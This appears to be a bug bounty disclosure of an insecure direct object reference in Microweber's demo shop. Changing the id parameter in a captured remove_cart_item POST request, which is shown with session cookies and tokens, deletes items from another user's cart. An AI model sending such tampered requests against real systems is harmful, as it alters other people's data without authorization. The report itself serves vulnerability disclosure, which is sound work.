Description

I found a IDOR vulnerability where we can able to delete their product in the cart by the id parameter

Steps to Produce:

• First add any product in to the cart and checkout
• In the checkout page , we can see the cart details and we have functionality to delete the product also
• I gave the request to delete the product from the cart and the request look like this

Request:

POST /demo/api/remove_cart_item HTTP/1.1
Host: demo.microweber.org
Cookie: back_to_admin=https%3A//demo.microweber.org/demo/admin/; csrf-token-data=%7B%22value%22%3A%22ZTtOJvNj4GT9WO1hWUuTH8k51b55vLU8v7IbCauN%22%2C%22expiry%22%3A1645199386777%7D; mw-back-to-live-edit=true; show-sidebar-layouts=0; laravel_session=JfLYa02pKVNp14cHvEsEDfmcEPLtn9EuNGfViPTD; XSRF-TOKEN=ZTtOJvNj4GT9WO1hWUuTH8k51b55vLU8v7IbCauN
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:97.0) Gecko/20100101 Firefox/97.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 6
Origin: https://demo.microweber.org
Referer: https://demo.microweber.org/demo/contact-information
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close

id=123

• As you can see the id parameter , we can assume that the victim’s id is 144 . when we change our value to the victim id
• The product gets deleted from victim’s cart

Impact:

An attacker would able to delete anybody’s cart product without any user interaction